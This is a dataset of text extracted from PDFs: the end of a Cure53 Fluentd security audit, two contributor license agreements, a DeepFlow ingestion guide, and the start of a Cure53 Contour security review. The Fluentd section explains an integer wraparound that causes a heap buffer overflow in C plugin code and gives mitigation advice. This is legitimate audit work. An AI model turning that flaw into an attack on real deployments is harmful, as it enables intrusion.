unesc;\n int unesc_len;\n int nl;\n \n unesc = flb_malloc(len + 1);\n if (!unesc) {\n flb_errno();\n return FLB_FALSE;\n }\n unesc_len = flb_unescape_string (str, len, &unesc);\n1 https://github.com/technion/ruby-argon2\nCure53, Berlin · 05/30/19 14/16 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \nIn these examples, it is possible that with a len-value of 0xffffffff (-1), the allocation size\nwraps around to 0. As such, flb_malloc will call malloc with a size of 0 as well, thus\ncausing a zero-sized heap allocation. This will later lead to an additional heap buffer\noverflow in flb_unescape_string. The reason is that len itself will still remain at 0xffffffff\nand causes out-of-bounds writes.\nTo prevent this scenario from being exploitable, it is recommended to implement an\nadditional check on flb_malloc and only go forward with the allocation when the size\nparameter is greater than 0. This counts for all the remaining wrappers around realloc\nand calloc as well.\nConclusions\nThe overall impression gained from this 2019 assessment of the Fluentd complex is\nrather mixed. This applies to the entire scope, also to the Fluentd unified logging layer,\nand points to the fact that the Cure53 team managed to spot both some strengths and\nsignificant weaknesses on the Fluentd scope.\nBefore presenting the conclusions, it should be clarified that this Cure53 investigation of\nthe Fluentd software compound was generously sponsored by The Linux Foundation /\nCloud Native Computing Foundation, which enabled a team consisting of five Cure53\ntesters to investigate the software system over the course of eighteen days in May of\n2019. All in all, good coverage of the somewhat loosely and only incrementally defined\nscope has been achieved, which is paramount in relation to a large amount of the\nexisting external plugins and their respective implicit dependencies. In that sense, the\nresults of this assessment can only reflect the quality of a comparably small area of the\nproject’s rather extensive range. In particular, the components added to the scope at the\nvery end of the investigation were eventually left out to produce better coverage of the\npreviously defined components.\nOn the one hand, the findings spotted during the initial manual code audit of the Fluentd\ncodebase did not unveil any major vulnerabilities. On the other hand, the penetration test\nof the locally created installations and the fuzzing of the selected external plugins\nresulted in a number of problems with significant severities - as evidenced by four\n“Critical”-severity issues. This apparent gap in the code quality between the main\ncodebase and the selected external plugins is a cause of concern and represents room\nfor growth. The choice of implementation language seems to play a large role in this\ndisparity. While the main codebase was implemented within the Ruby environment, the\nexamined external plugins were mostly implemented in native C language. Drawing on\nthese observations, the code quality seems to widely vary across the board.\nCure53, Berlin · 05/30/19 15/16 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \nThe auditors recommend for the codebase, inclusive of all external plugins, especially\nthe ones implemented in native C, to be further audited for weaknesses akin to the ones\nuncovered by this investigation. Furthermore, because of timing and coverage\nconstraints, some of the discovered vulnerabilities were not analyzed to their very root\ncauses. As such, they should be investigated in full by the in-house developers. The\nfuzzing against individual plugins should be continued since a respectable amount of\nadditional crashes did not lead to exploitable vulnerabilities but pointed to additional, yet\nunknown problems. Apart from the above concerns, the aspects of the codebase\nimplemented within the Ruby environment can be seen as shipping good quality code\nand a well-established security premise. Considering the rather large number of plugins,\nit can be advised to split the external plugins into two distinct quality groups: the few that\nhave been audited already and which can be trusted more than the many that have been\nsomewhat neglected so far.\nCure53 would like to thank Eduardo Silva and Yuta Iwama from the Fluentd\ndevelopment team as well as Chris Aniszczyk of The Linux Foundation, for their project\ncoordination, support and assistance, both before and during this assignment. Special\ngratitude also needs to be extended to The Linux Foundation for sponsoring this project.\nCure53, Berlin · 05/30/19 16/16" } ]
{ "category": "Observability and Analysis", "file_name": "test.pdf", "project_name": "Elastic", "subcategory": "Observability" }
[ { "data": "This is a test, with umlauts, from München\nAlso contains newlines for testing.\nAnd one more." } ]
{ "category": "Observability and Analysis", "file_name": "cla.pdf", "project_name": "Checkmk", "subcategory": "Observability" }
[ { "data": "Contribut orLicenseAgreemen t\nThankyouforyourinterestincontributingtoCheckmkandassociatedprojectsrunbyCheckmkGmbH(\"We\"or\"Us\").\nThepurposeofthiscontributorlicenseagreement(\"Agreement\")istoclarifyanddocumenttherightsgrantedbycontributorstoUs.FurtherinformationregardingtheAgreementcanbefoundattheREADME.\nHowtousethis ContributorAgreement\nIfyouowntheContributionyourself,youneedtosignthisAgreementeitherelectronicallyviatheCLABotonGitHuborbysendingasignedcopytocla@checkmk.com.IfYouareanemployeeandhavecreatedtheContributionaspartofyouremployment,YouneedtosignthisAgreementandhaveYouremployerapprovethisAgreementbyhavinganauthorizedrepresentativesignthisAgreementinadditiontoYou,andsendthesignedcopytocla@checkmk.com.IfYouchangeemployersinthefutureanddesiretoSubmitadditionalContributionsforthenewemployer,thenYouagreetosignanewAgreementandsecurepermissionfromthenewemployerbeforeSubmittingthoseContributions.IfYoudonotowntheCopyrightintheentireworkofauthorship,anyotherauthoroftheContributionshouldalsosignthisAgreement–inanyevent,pleasecontactUsat cla@checkmk.com.\n1.Definitions\n\"You\" meanstheCopyrightownerwhoSubmitsaContributiontoUs.IfYouareanemployeeandhavecreatedtheContributionaspartofyouremployment,theterm“You”inthisAgreementwillrefertoYouandtheemployercollectively.\n\"Contribution\" meansanyoriginalworkofauthorship,includinganyoriginalmodificationsoradditionstoanexistingworkofauthorship,SubmittedbyYoutoUs,inwhichYouowntheCopyright.\n\"Copyright\" meansallrightsprotectingworksofauthorship,includingcopyright,moralandneighboringrights,asappropriate,forthefulltermoftheirexistence.\n\"Material\" meansthesoftwareordocumentationmadeavailablebyUstothirdparties.WhenthisAgreementcoversmorethanonesoftwareproject,theMaterialmeansthesoftwareordocumentationtowhichtheContributionwasSubmitted.AfterYouSubmittheContribution,itmaybeincludedintheMaterial.\n\"Submit\" meansanyactbywhichaContributionistransferredtoUsbyYoubymeansoftangibleorintangiblemedia,includingbutnotlimitedtoelectronicmailinglists,sourcecodecontrolsystems,andissuetrackingsystemsthataremanagedby,oronbehalfof,Us,butexcludinganytransferthatisconspicuouslymarkedorotherwisedesignatedinwritingbyYouas\"NotaContribution.\"\n2.Licensegrant\n2.1CopyrightlicensetoUs\nSubjecttothetermsandconditionsofthisAgreement,YouherebygranttoUsaworldwide,royalty-free, non-exclusive,perpetualandirrevocablelicense,withtherighttotransferanunlimitednumberofnon-exclusivelicensesortograntsublicensestothirdparties,undertheCopyrightcoveringtheContributiontousetheContributionbyallmeans,including,butnotlimitedto:\n●publishtheContribution,\n●modifytheContribution,\n●preparederivativeworksbaseduponorcontainingtheContributionand/ortocombinetheContributionwithotherMaterials,\n●reproducetheContributioninoriginalormodifiedform,\n●distribute,tomaketheContributionavailabletothepublic,displayandpubliclyperformtheContributioninoriginalormodifiedform.\n2.2Moralrights\nMoralRightsremainunaffectedtotheextenttheyarerecognizedandnotwaivablebyapplicablelaw.Notwithstanding,YoumayaddyournametotheattributionmechanismcustomaryusedintheMaterialsyou\nPage1/3Contributeto,suchastheheaderofthesourcecodefilesofYourContribution,andWewillrespectthisattributionwhenusingYourContribution.\n3.Patents\n3.1Patentlicense\nSubjecttothetermsandconditionsofthisAgreementYouherebygranttoUsandtorecipientsofMaterialsdistributedbyUsaworldwide,royalty-free,non-exclusive,perpetualandirrevocable(exceptasstatedinSection3.2)patentlicense,withtherighttotransferanunlimitednumberofnon-exclusivelicensesortograntsublicensestothirdparties,tomake,havemade,use,sell,offerforsale,importandotherwisetransfertheContributionandtheContributionincombinationwithanyMaterial(andportionsofsuchcombination).ThislicenseappliestoallpatentsownedorcontrolledbyYou,whetheralreadyacquiredorhereafteracquired,thatwouldbeinfringedbymaking,havingmade,using,selling,offeringforsale,importingorotherwisetransferringofYourContribution(s)aloneorbycombinationofYourContribution(s)withanyMaterial.\n3.2Revocationofpatentlicense\nYoureservetherighttorevokethepatentlicensestatedinsection3.1ifWemakeanyinfringementclaimthatistargetedatyourContributionandnotassertedforaDefensivePurpose.AnassertionofclaimsofthePatentsshallbeconsideredfora\"DefensivePurpose\"iftheclaimsareassertedagainstanentitythathasfiled,maintained,threatened,orvoluntarilyparticipatedinapatentinfringementlawsuitagainstUsoranyofOurlicensees.\n4. Disclaimer\nTHECONTRIBUTIONISPROVIDED\"ASIS\".MOREPARTICULARLY,ALLEXPRESSORIMPLIEDWARRANTIESINCLUDING,WITHOUTLIMITATION,ANYIMPLIEDWARRANTYOFSATISFACTORYQUALITY,FITNESSFORAPARTICULARPURPOSEANDNON-INFRINGEMENTAREEXPRESSLYDISCLAIMEDBYYOUTOUSANDBYUSTOYOU.TOTHEEXTENTTHATANYSUCHWARRANTIESCANNOTBEDISCLAIMED,SUCHWARRANTYISLIMITEDINDURATIONANDEXTENTTOTHEMINIMUMPERIODANDEXTENTPERMITTEDBYLAW.\n5. Consequentialdamagewaiver\nTOTHEMAXIMUMEXTENTPERMITTEDBYAPPLICABLELAW,INNOEVENTWILLYOUORWEBELIABLEFORANYLOSSOFPROFITS,LOSSOFANTICIPATEDSAVINGS,LOSSOFDATA,INDIRECT,SPECIAL,INCIDENTAL,CONSEQUENTIALANDEXEMPLARYDAMAGESARISINGOUTOFTHISAGREEMENTREGARDLESSOFTHELEGALOREQUITABLETHEORY(CONTRACT,TORTOROTHERWISE)UPONWHICHTHECLAIMISBASED.\n6. Approximationofdisclaimeranddamagewaiver\nIFTHEDISCLAIMERANDDAMAGEWAIVERMENTIONEDINSECTION 4. ANDSECTION 5. CANNOTBEGIVENLEGALEFFECTUNDERAPPLICABLELOCALLAW,REVIEWINGCOURTSSHALLAPPLYLOCALLAWTHATMOSTCLOSELYAPPROXIMATESANABSOLUTEWAIVEROFALLCIVILORCONTRACTUALLIABILITYINCONNECTIONWITHTHECONTRIBUTION.\n7. Term\n7.1 ThisAgreementshallcomeintoeffectuponYouracceptanceofthetermsandconditions.\n7.2 ThisAgreementshallapplyforthetermofthecopyrightandpatentslicensedhere. \n8 Miscellaneous\n8.1 ThisAgreementandalldisputes,claims,actions,suitsorotherproceedingsarisingoutofthisagreementorrelatinginanywaytoitshallbegovernedbythelawsof Germanyexcludingitsprivateinternationallawprovisions.\n8.2 ThisAgreementsetsouttheentireagreementbetweenYouandUsforYourpast,presentandfutureContributionstoUsandoverridesallotheragreementsorunderstandings.\n8.3 IncaseofYourdeath,thisagreementshallcontinuewithYourheirs.Incaseofmorethanoneheir,allheirsmustexercisetheirrightsthroughacommonlyauthorizedperson.\n8.4 IfanyprovisionofthisAgreementisfoundvoidandunenforceable,suchprovisionwillbereplacedtotheextentpossiblewithaprovisionthatcomesclosesttothemeaningoftheoriginalprovisionandthatisenforceable.ThetermsandconditionssetforthinthisAgreementshallapplynotwithstandinganyfailureofessentialpurposeofthisAgreementoranylimitedremedytothemaximumextentpossibleunderlaw.\nPage2/38.5 YouagreetonotifyUsofanyfactsorcircumstancesofwhichyoubecomeawarethatwouldmakethisAgreementinaccurateinanyrespect.\nThisisalegalcontractcontainingpersonaldata.Pleaserefertohttps://checkmk.com/privacy-policyforthepolicygoverninghowpersonaldataisusedandshared.\nYou \nDate:\nName:\nGitHubUsername:\nAddress:\nSignature:\nApprovedbyemployer(requiredforcorporatecontributions)\nDate:\nCompanyName:\nGitHubOrganization:\nName:\nTitle:\nAddress:\nSignature:\nPage3/3" } ]
{ "category": "Observability and Analysis", "file_name": "integration_collector.pdf", "project_name": "DeepFlow", "subcategory": "Observability" }
[ { "data": "使用文档\nHTTP_PROXY 默认绑定 38086 端口,端口可以在控制器更改 , AGENT_IP 指metaflow-agent 运行所在环境\n的IP\n接收OpenTelemetry 追踪数据\n将已压缩 OpenTelemetry 信息通过 HTTP POST 请求发送\ncurl -v -i --data-binary @otel.gzip -H 'Content-Encoding: gzip' http://AGENT_IP:38086/api/\n将OpenTelemetry 信息通过 HTTP POST 请求发送\ncurl -v --data @otel.bin http://AGENT_IP:38086/api/v1/otel/trace \n接收Prometheus 监控数据\n在prometheus.yaml 配置远程写入\n# Settings related to the remote write feature. \nremote_write: \n - url: http://AGENT_IP:38086/api/v1/prometheus \n接收Telegraf 监控数据\n在telegraf.conf 配置HTTP 代理\n[[outputs.http]] \n## URL is the address to send metrics to \n url = \"http://127.0.0.1:38086/api/v1/telegraf\" \n data_format = \"influx\" " } ]
{ "category": "Orchestration & Management", "file_name": "Slurm_Entity.pdf", "project_name": "Slurm", "subcategory": "Scheduling & Orchestration" }
[ { "data": "Slurm Workload Manager Entity Contributor License Agreement\nThank you for your interest in contributing to Slurm Workload Manager (\"We\" or \"Us\").\nThis contributor agreement (\"Agreement\") documents the rights granted by contributors to Us. To\nmake this document effective, please sign it and send it to Us by email, following the instructions at\nhttp://www.schedmd.com/slurmdocs/contributor.html. This is a legally binding document, so please\nread it carefully before agreeing to it. The Agreement may cover more than one software project\nmanaged by Us.\n1. Definitions\n\"You\" means any Legal Entity on behalf of whom a Contribution has been received by Us. \"Legal\nEntity\" means an entity which is not a natural person. \"Affiliates\" means other Legal Entities that\ncontrol, are controlled by, or under common control with that Legal Entity. For the purposes of\nthis definition, \"control\" means (i) the power, direct or indirect, to cause the direction or\nmanagement of such Legal Entity, whether by contract or otherwise, (ii) ownership of fifty\npercent (50%) or more of the outstanding shares or securities which vote to elect the management\nor other persons who direct such Legal Entity or (iii) beneficial ownership of such entity.\n\"Contribution\" means any work of authorship that is Submitted by You to Us in which You own\nor assert ownership of the Copyright. If You do not own the Copyright in the entire work of\nauthorship, please follow the instructions in\nhttp://www.schedmd.com/slurmdocs/contributor.html.\n\"Copyright\" means all rights protecting works of authorship owned or controlled by You or Your\nAffiliates, including copyright, moral and neighboring rights, as appropriate, for the full term of\ntheir existence including any extensions by You.\n\"Material\" means the work of authorship which is made available by Us to third parties. When\nthis Agreement covers more than one software project, the Material means the work of authorship\nto which the Contribution was Submitted. After You Submit the Contribution, it may be included\nin the Material.\n\"Submit\" means any form of electronic, verbal, or written communication sent to Us or our\nrepresentatives, including but not limited to electronic mailing lists, source code control systems,\nand issue tracking systems that are managed by, or on behalf of, Us for the purpose of discussing\nand improving the Material, but excluding communication that is conspicuously marked or\notherwise designated in writing by You as \"Not a Contribution.\"\n\"Submission Date\" means the date on which You Submit a Contribution to Us.\n\"Effective Date\" means the date You execute this Agreement or the date You first Submit a\nContribution to Us, whichever is earlier.\n\"Media\" means any portion of a Contribution which is not software.\n2. Grant of Rights\n2.1 Copyright License\n(a) You retain ownership of the Copyright in Your Contribution and have the same rights to use or\nlicense the Contribution which You would have had without entering into the Agreement.\n1 of 4\nHarmony (HA-CLA-E) Version 1.0(b) To the maximum extent permitted by the relevant law, You grant to Us a perpetual, worldwide,\nnon-exclusive, transferable, royalty-free, irrevocable license under the Copyright covering the\nContribution, with the right to sublicense such rights through multiple tiers of sublicensees, to\nreproduce, modify, display, perform and distribute the Contribution as part of the Material; provided\nthat this license is conditioned upon compliance with Section 2.3.\n2.2 Patent License\nFor patent claims including, without limitation, method, process, and apparatus claims which You or\nYour Affiliates own, control or have the right to grant, now or in the future, You grant to Us a\nperpetual, worldwide, non-exclusive, transferable, royalty-free, irrevocable patent license, with the\nright to sublicense these rights to multiple tiers of sublicensees, to make, have made, use, sell, offer\nfor sale, import and otherwise transfer the Contribution and the Contribution in combination with the\nMaterial (and portions of such combination). This license is granted only to the extent that the\nexercise of the licensed rights infringes such patent claims; and provided that this license is\nconditioned upon compliance with Section 2.3.\n2.3 Outbound License\nAs a condition on the grant of rights in Sections 2.1 and 2.2, We agree to license the Contribution only\nunder the terms of the license or licenses which We are using on the Submission Date for the Material\n(including any rights to adopt any future version of a license if permitted).\nIn addition, We may use the following licenses for Media in the Contribution: (including any right to\nadopt any future version of a license if permitted).\n2.4 Moral Rights. If moral rights apply to the Contribution, to the maximum extent permitted by law,\nYou waive and agree not to assert such moral rights against Us or our successors in interest, or any of\nour licensees, either direct or indirect.\n2.5 Our Rights. You acknowledge that We are not obligated to use Your Contribution as part of the\nMaterial and may decide to include any Contribution We consider appropriate.\n2.6 Reservation of Rights. Any rights not expressly assigned or licensed under this section are\nexpressly reserved by You.\n3. Agreement\nYou confirm that:\n(a) You have the legal authority to enter into this Agreement.\n(b) You or Your Affiliates own the Copyright and patent claims covering the Contribution which are\nrequired to grant the rights under Section 2.\n(c) The grant of rights under Section 2 does not violate any grant of rights which You or Your\nAffiliates have made to third parties.\n(d) You have followed the instructions in http://www.schedmd.com/slurmdocs/contributor.html, if You\ndo not own the Copyright in the entire work of authorship Submitted.\n4. Disclaimer\nEXCEPT FOR THE EXPRESS WARRANTIES IN SECTION 3, THE CONTRIBUTION IS\n2 of 4\nHarmony (HA-CLA-E) Version 1.0PROVIDED \"AS IS\". MORE PARTICULARL Y, ALL EXPRESS OR IMPLIED WARRANTIES \nINCLUDING, WITHOUT LIMIT ATION, ANY IMPLIED WARRANTY OF MERCHANTABILITY, \nFITNESS FOR A PARTICULAR PURPOSE AND NON-INFRINGEMENT ARE EXPRESSLY \nDISCLAIMED BY YOU TO US AND BY US TO YOU. TO THE EXTENT TH AT ANY SUCH \nWARRANTIES CANNOT BE DISCLAIMED, SUCH WARRANTY IS LIMITED IN DURATION \nTO THE MINIMUM PERIOD PERMITTED BY L AW.\n5. Consequential Damage Waiver\nTO THE MAXIMUM EXTENT PERMITTED BY APPLICABLE L AW, IN NO EVENT WILL \nYOU OR US BE LIABLE FOR ANY LOSS OF PROFITS, LOSS OF ANTICI PATED SAVINGS, \nLOSS OF D ATA, INDIRECT, SPECIAL, INCIDENTAL, CONSEQUENTIAL AND EXEMPLA RY \nDAMAGES ARISING OUT OF THIS AGREEMENT REGARDLESS OF THE LEGAL OR \nEQUITABLE THEORY (CONTRAC T, TORT OR OTHERWISE) UPON WHICH THE CLAIM IS \nBASED.\n6. Miscellaneous\n6.1 This Agreement will be governed by and construed in accordance with the laws of Utah County, \nUtah, USA excluding its conflicts of law provisions. Under certain circumstances, the governing law \nin this section might be superseded by the United Nations Convention on Contracts for the \nInternational Sale of Goods (\"UN Convention\") and the parties intend to avoid the application of the \nUN Convention to this Agreement and, thus, exclude the application of the UN Convention in its \nentirety to this Agreement.\n6.2 This Agreement sets out the entire agreement between You and Us for Your Contributions to Us \nand overrides all other agreements or understandings.\n6.3 If You or We assign the rights or obligations received through this Agreement to a third part y, as a \ncondition of the assignment, that third party must agree in writing to abide by all the rights and \nobligations in the Agreement.\n6.4 The failure of either party to require performance by the other party of any provision of this \nAgreement in one situation shall not affect the right of a party to require such performance at any time \nin the future. A waiver of performance under a provision in one situation shall not be considered a \nwaiver of the performance of the provision in the future or a waiver of the provision in its entiret y.\n6.5 If any provision of this Agreement is found void and unenforceable, such provision will be \nreplaced to the extent possible with a provision that comes closest to the meaning of the original \nprovision and which is enforceable. The terms and conditions set forth in this Agreement shall apply \nnotwithstanding any failure of essential purpose of this Agreement or any limited remedy to the \nmaximum extent possible under la w.\nYou\n________________________\nName: __________________\nTitle: ___________________\nAddress: ________________\n________________________\nUs\n________________________\n3 of 4\nHarmony (HA-CLA-E) Version 1.0Name: __________________\nTitle: ___________________\nAddress: ________________\n________________________\n4 of 4\nHarmony (HA-CLA-E) Version 1.0" } ]
{ "category": "Orchestration & Management", "file_name": "Contour_Security_Audit_Dec2020.pdf", "project_name": "Contour", "subcategory": "Service Proxy" }
[ { "data": " Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \nSecurity-Review Report Contour 11.2020\nCure53, Dr.-Ing. M. Heiderich, M. Wege, MSc. N. Krein, MSc. D. Weißer\nIndex\nIntroduction\nScope\nTest Methodology\nPhase 1: General security posture checks\nPhase 2: Manual code audits and penetration tests\nPhase 1: General security posture checks\nApplication/Service/Project Specifics\nOrganization/Team/Infrastructure Specifics\nEvaluating the Overall Posture\nPhase 2: Manual code auditing & pentesting\nIdentified Vulnerabilities\nCON-01-004 WP1: contour certgen stores private keys as world-accessible (Low)\nMiscellaneous Issues\nCON-01-001 WP2: Build system lacks PIE and RELRO executable flags (Low)\nCON-01-002 WP1: Improper error handling in grpcOptions function (Info)\nCON-01-003 WP1: shutdown-manager Envoy health check lacks retry logic (Info)\nCON-01-005 WP1: Support of weak cipher-suites (Info)\nConclusions\nCure53, Berlin · 12/16/20 1/23 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \nIntroduction\n“Contour is an Ingress controller for Kubernetes that works by deploying the Envoy\nproxy as a reverse proxy and load balancer. Contour supports dynamic configuration\nupdates out of the box while maintaining a lightweight profile.”\nFrom https://github.com/projectcontour/contour\nThis report documents the results of a security assessment targeting the Contour\nsoftware complex. Carried out by Cure53 in late 2020, the project entailed a penetration\ntest, a source code audit and a broader review of the security posture characterizing the\nContour software project.\nThe work was requested by CNCF and promptly executed by Cure53 in mid-to-late\nNovember 2020, precisely in CW46 and CW47. The investigation took place in a close\ncollaboration with the Contour development team.\nA team of Cure53 senior testers was chosen and included five skill-matched members.\nTogether they prepared, conducted, finalized and documented this assessment. The\nallocated budget was twenty person-days, with the majority of time spent on testing the\ngiven scope. For better structuring and to make sure that all key areas of interest for\nContour/CNCF are covered, Cure53 worked with two work packages:\n•WP1: Security Review & Source Code Audit against “Contour v1.10.0”\n•WP2: Penetration Test against prod-like “Contour v1.10.0” deployment\nAs this delineation has proven not granular enough, it is important to note that WP1 also\nincluded a comprehensive security posture review rather than being limited to looking at\nthe project sources only. This is reflected in the split of work into two phases,\nsubsequently occurring on the project’s timeline. In WP1 Phase 1, Cure53 completed\ngeneral security posture checks, while Phase 2 concentrated on manual code audits and\npenetration tests.\nWhite-box methods were deployed, as dictated by the established best practices within\nCure53-CNCF cooperation. At any rate, all source code pertinent to Contour is available\non GitHub as OSS. Thus, Cure53 also managed to deploy a working environment using\na GCP architecture for testing without any hurdles.\nThe project started on time and progressed efficiently. Communications with the Contour\nproject team were done using a dedicated private channel on the CNCF Slack\nworkspace, wherein all involved personnel could contribute to the ongoing discussions\nand work. Communications were very helpful and productive and, given the good\nCure53, Berlin · 12/16/20 2/23 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \npreparations for this test, not much of a back and forth was needed. Cure53 was able to\nask questions and share feedback about the emerging conclusions and findings.\nIn terms of concrete findings in the realm of security vulnerabilities and general\nweaknesses, Cure53 managed to spot only five issues. Only one should be seen as an\nactual vulnerability, while the remaining items are weaknesses with rather low or even\nnegligible exploitation potential. This is supported by the scores ascribed to the\ndiscoveries, which are mostly set to Low or even just Info. Quite clearly, the results can\nbe interpreted as very impressive. In the time dedicated to the assessment, the Contour\nproject’s code and deployment made a very solid impression of being free from major\nrisks.\nIn the following sections, the report will first shed light on the scope and key test\nparameters, WPs, phases and setup. Next, the report proceeds to a dedicated chapter\non test coverage and methodology to highlight what Cure53 looked at during the\npenetration tests, infrastructure reviews and code audits, even if a given area yielded no\nfindings. The report moves forward with the results of the security posture review\nexecuted in Phase 1 of the project, followed by a section covering the high-level results\nof Phase 2, i.e. the code audits and penetration test. The preceding sections are added\nfor the sake of transparency on the tasks completed in this assessment.\nThe spotted findings will then be discussed, first by category (vulnerability/general\nweakness) and chronologically within the latter section. Alongside technical descriptions,\nPoC and mitigation advice are supplied when applicable. Finally, the report will close\nwith broader conclusions about this late autumn 2020 project. Cure53 elaborates on the\ngeneral impressions and reiterates the verdict based on the testing team’s observations\nand collected evidence. Tailored recommendations for the Contour complex are also\nincorporated into the final section.\nCure53, Berlin · 12/16/20 3/23 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \nScope\n•Security Review & Source Code Audit against Contour v1.10.0\n◦WP1: Security Review & Source Code Audit against “Contour v1.10.0”\n◦WP2: Penetration Test against prod-like “Contour v1.10.0” deployment\n▪https://github.com/projectcontour/contour \n•branch/tag ‘release 1.10’\n•commit 92420b8e0b123afb475bb7df9f50c85da29592cb\n▪GCP/Kubernetes with three VM instances\n•35.242.240.72 (node)\n•34.107.12.224 (node)\n•34.107.21.235 (node)\n•34.107.79.192 (cluster)\nCure53, Berlin · 12/16/20 4/23 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \nTest Methodology\nThe following paragraphs describe the metrics and methodologies used to evaluate the\nsecurity posture of the Contour project and codebase. In addition, it includes results\npertinent to individual areas of the project’s security properties that were either selected\nby Cure53 or singled out by other involved parties as calling for a closer inspection.\nSimilarly to previous tests for CNCF, this assignment was also divided into two phases.\nThe general security posture and maturity of the audited codebase of Contour has been\nexamined in Phase 1. The usage of external dependencies has been audited, security\nconstraints for Contour configurations were examined and the documentation had been\ndeeply studied in order to get a general idea of security awareness levels at Contour.\nThis was followed by research on how security reports and vulnerabilities are handled\nand whether a healthily secure infrastructure is seen as a serious matter. The latter\nphase covered actual tests and audits against the Contour codebase, with the code\nquality and its hardening evaluated.\nPhase 1: General security posture checks\nAs mentioned earlier, Phase 1 concentrated on general qualities of the audited project.\nHere, a meta-level perspective on the overall security posture is reached by providing\ndetails about the language specifics, configurational pitfalls and documentation. An\nadditional view on how Contour handles vulnerability reports and how the disclosure\nprocess works is provided as well. A perception rooted in the maturity of Contour is\ngiven, solely on the meta-level. Actual impressions linked to the code quality relate to\nPhase 2 of the audit process.\nPhase 2: Manual code audits and penetration tests\nFor this component, Cure53 performed a best-effort code review and attempted to\nidentify security-relevant areas of the project’s codebase and inspect them for flaws that\nare usually present in distributed systems. This is an addition to the previous maturity\nanalysis and supplies a more detailed perspective on the project’s implementation when\nit comes to security-relevant portions of the code. Still, this Phase was limited by the\nbudget and cannot be seen as complete without a large-scale code review with an in-\ndepth analysis of the multiple parts forming the project’s scope. As such, the goal was\nnot to reach an extensive coverage but to gain an impression about the overall quality of\nContour and determine which parts of the project areas deserve thorough audits in the\nfuture.\nLater chapters of this report will also elaborate on what was being inspected, why and\nwith what implications for the Contour software complex.\nCure53, Berlin · 12/16/20 5/23 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \nPhase 1: General security posture checks\nThis Phase is meant to provide a more detailed overview of the Contour project’s\nsecurity properties that are seen as somewhat separate from both the code and the\nContour software. The first few subsections of the posture audit focus on more abstract\ncomponents of a specific project instead of judging the code quality itself. Later\nsubsections look at elements that are linked more strongly to the organizational and\nteam aspects of Contour . In addition to the items presented below, the Cure53 team also\nfocused on the following tasks to be able to conduct a cross-comparative analysis of all\nobservations.\n•The documentation was examined to understand all provided functionality and\nacquire examples of what a real-world deployment of Contour looks like. The\nextensive architectural design documentation was reviewed as well.\n•Several variants of Kubernetes test-clusters were deployed to understand which\noptions are available and how the different parts of such deployments work\ntogether to form a functioning unit.\n•The network topology and connected parts of the overall architecture were\nexamined. This also included consideration of relevant runtime- and\nenvironment-specifications that are necessary to run Contour.\n•The main control flow of the Contour software was followed and the general\nstructure of the codebase has been analyzed.\n•High-level code audits have been conducted. This was necessary to get a quick\nimpression of the overall style and to reach an understanding of which areas are\ninteresting for a more deep-dive approach in Phase 2 of the audit.\n•Normally, past vulnerability reports in Contour would have been checked out to\nspot interesting areas that suffered in the past. However, Contour only ever\nreceived a single vulnerability report.\n•Concluding on the steps above, the project’s maturity was evaluated; specific\nquestions about the software were compiled from a general catalogue according\nto individual applicability.\nCure53, Berlin · 12/16/20 6/23 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \nApplication/Service/Project Specifics\nIn this section, Cure53 will share insights on the application-specific aspects which lead\nto a good security posture. These include the choice of programming language,\nselection and oversight of external third-party libraries, as well as other technical aspects\nlike logging, monitoring, test coverage and access control.\nLanguage Specifics\nProgramming languages can provide functions that pose an inherent security risk and\ntheir use is either deprecated or discouraged. For example, strcpy() in C has led to many\nsecurity issues in the past and should be avoided altogether. Another example would be\nthe manual construction of SQL queries versus the usage of prepared statements. The\nchoice of language and enforcing the usage of proper API functions are therefore crucial\nfor the overall security of the project.\nLike many other software stacks that integrate into Kubernetes, Contour is written in Go.\nGo has proven to offer higher levels of memory safety compared to other languages that\ncompile to native code. It is quite rare to spot direct memory safety issues that other\nlanguages such as C and C++ suffer from. Things like buffer overflows, type confusions\nor Use-After-Free vulnerabilities are directly taken care of by Go’s internal memory\nmanagement system itself. The compiler equally makes sure that memory bounds are\nautomatically verified by placing checkpoints into the generated assembly. Although it is\nstill possible to write unsafe Go code, Contour refrains from doing so.\nAs such, the code is written with best practices in mind. Extensive nesting of conditional\nstatements is avoided. Functions return early, usually by throwing descriptive error\nmessages via fmt.Errorf. Test cases and production code are sufficiently separated,\nalthough not specifically in distinguished directories. Documentation in form of\ncommented code is somewhat present, but the specifications inside the design folder\nmore than make up for that. Additionally, gosec is deliberately added as a linter for\nautomatic security checks against common pitfalls.\nExternal Libraries & Frameworks\nWhile external libraries and frameworks can also contain vulnerabilities, it is nonetheless\nbeneficial to rely on sophisticated libraries instead of reinventing the wheel with every\nproject. This is especially true for cryptographic implementations, since those are known\nto be prone to errors.\nSince Contour integrates into Kubernetes, deploys the Envoy proxy and additionally\nextends Kubernetes’ Ingress API, it heavily relies on third party code and libraries. For\nexample, TLS certificate handling relies on Go’s crypto/x509, crypto/tls and\nencoding/pem libraries all of which are well tested and established in most Go software\nCure53, Berlin · 12/16/20 7/23 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \nstacks. Envoy itself has a rather good security track record with post-mortem\ndiscussions for past detected vulnerabilities. Generally no concerns were found to be\npresent in the used third-party packages. All appear to be widely recognized by the\ncommunity and seem to be under active development.\nConfiguration Concerns\nComplex and adaptable software systems usually have many variable options which can\nbe configured accordingly to what the actually deployed application necessitates. While\nthis is a very flexible approach, it also leaves immense room for mistakes. As such, it\noften creates the need for additional and detailed documentation, in particular when it\ncomes to security.\nActual concern lies in the communication between Contour and the Envoy proxy 